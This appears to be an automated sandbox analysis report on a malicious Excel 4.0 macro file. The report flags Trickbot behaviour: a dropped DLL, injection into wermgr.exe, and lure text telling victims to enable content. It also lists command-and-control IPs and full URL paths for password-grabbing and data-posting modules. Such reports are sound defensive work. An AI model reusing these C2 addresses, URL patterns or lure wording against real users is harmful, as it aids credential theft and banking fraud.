Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300 CryptAcquireContextW,		5_2_00068300
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083634 CryptUnprotectData,		9_2_0000000180083634

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,		5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,		5_2_00063B00

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmouser[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00073460
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx edx, word ptr [eax]	5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000792A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000756D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx ecx, word ptr [eax+02h]	5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00079010
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00082890
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec ecx	5_2_000784A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000784A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov ebx, edx	5_2_000744D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000744D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073CFF
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_00074D36
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073D6F
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073D8D
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_0006A990
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DAF
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000801D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DDB
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DF6
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then call 000619E0h	5_2_000671F0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_0007B1F0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ecx	5_2_0006D600
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00070E00
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073E15
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_0006E640
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_0006E250
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then cmp dword ptr [eax], ecx	5_2_0006D6A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec edi	5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00070F00
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00068750
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_00082BA0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ebp	5_2_000783F0

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: deluciaspizza.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49170 -> 188.18.7.133:447

May check the online IP address of the machine

Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 188.18.7.133:447

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.102.220.50 103.102.220.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f

Uses a known web browser user agent for HTTP communication

Source: global traffic

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EF8415A.emf

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.74.0Host: api.ipify.org

Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: deluciaspizza.com

Source: unknown

Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443
Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443Edge
Source: wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443W6
Source: wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443X6
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://115.241.244.185:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://177.84.63.252:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://185.119.120.213:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://189.195.96.238:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://190.89.3.117:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://36.95.27.243:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://5.202.120.150:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://83.220.115.230:443
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.c
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/
Source: wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4	Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start I ' ' ' 18 the decryption of
Source: Document image extraction number: 2	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3	Screenshot OCR: Enable Content
Source: Document image extraction number: 4	Screenshot OCR: Enable Editing
Source: Document image extraction number: 13	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document

Found Excel 4.0 Macro with suspicious formulas

Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: CALL
Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\System32\wermgr.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00073410 NtDelayExecution,	5_2_00073410
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00067C30 NtQueryInformationProcess,	5_2_00067C30
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0 NtQuerySystemInformation,CLSIDFromString,DuplicateHandle,HeapFree,	5_2_0007C8E0

Creates files inside the system directory

Source: C:\Windows\System32\wermgr.exe

File created: C:\Windows\system32\cn\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062810	5_2_00062810
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00084030	5_2_00084030
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00076890	5_2_00076890
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0	5_2_0007C8E0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065D60	5_2_00065D60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D180	5_2_0006D180
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006F600	5_2_0006F600
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CE60	5_2_0006CE60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000756D0	5_2_000756D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300	5_2_00068300
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006BB10	5_2_0006BB10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006EF30	5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063460	5_2_00063460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065460	5_2_00065460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007E460	5_2_0007E460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006A0A0	5_2_0006A0A0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000684D0	5_2_000684D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006ACD0	5_2_0006ACD0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000838F0	5_2_000838F0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063D20	5_2_00063D20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062530	5_2_00062530
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000611B0	5_2_000611B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D5D0	5_2_0006D5D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00077A10	5_2_00077A10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006AA20	5_2_0006AA20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00082E50	5_2_00082E50
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00071E60	5_2_00071E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CA80	5_2_0006CA80
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006C2B0	5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000796C0	5_2_000796C0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00080720	5_2_00080720
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00066F40	5_2_00066F40
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000823F0	5_2_000823F0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180011A74	9_2_0000000180011A74
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180016C20	9_2_0000000180016C20
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000FD48	9_2_000000018000FD48
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001AFC0	9_2_000000018001AFC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE4	9_2_000000018000BFE4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800110B4	9_2_00000001800110B4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800130E8	9_2_00000001800130E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800020E8	9_2_00000001800020E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800011DC	9_2_00000001800011DC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001822C	9_2_000000018001822C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001D2C0	9_2_000000018001D2C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180020300	9_2_0000000180020300
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180004320	9_2_0000000180004320
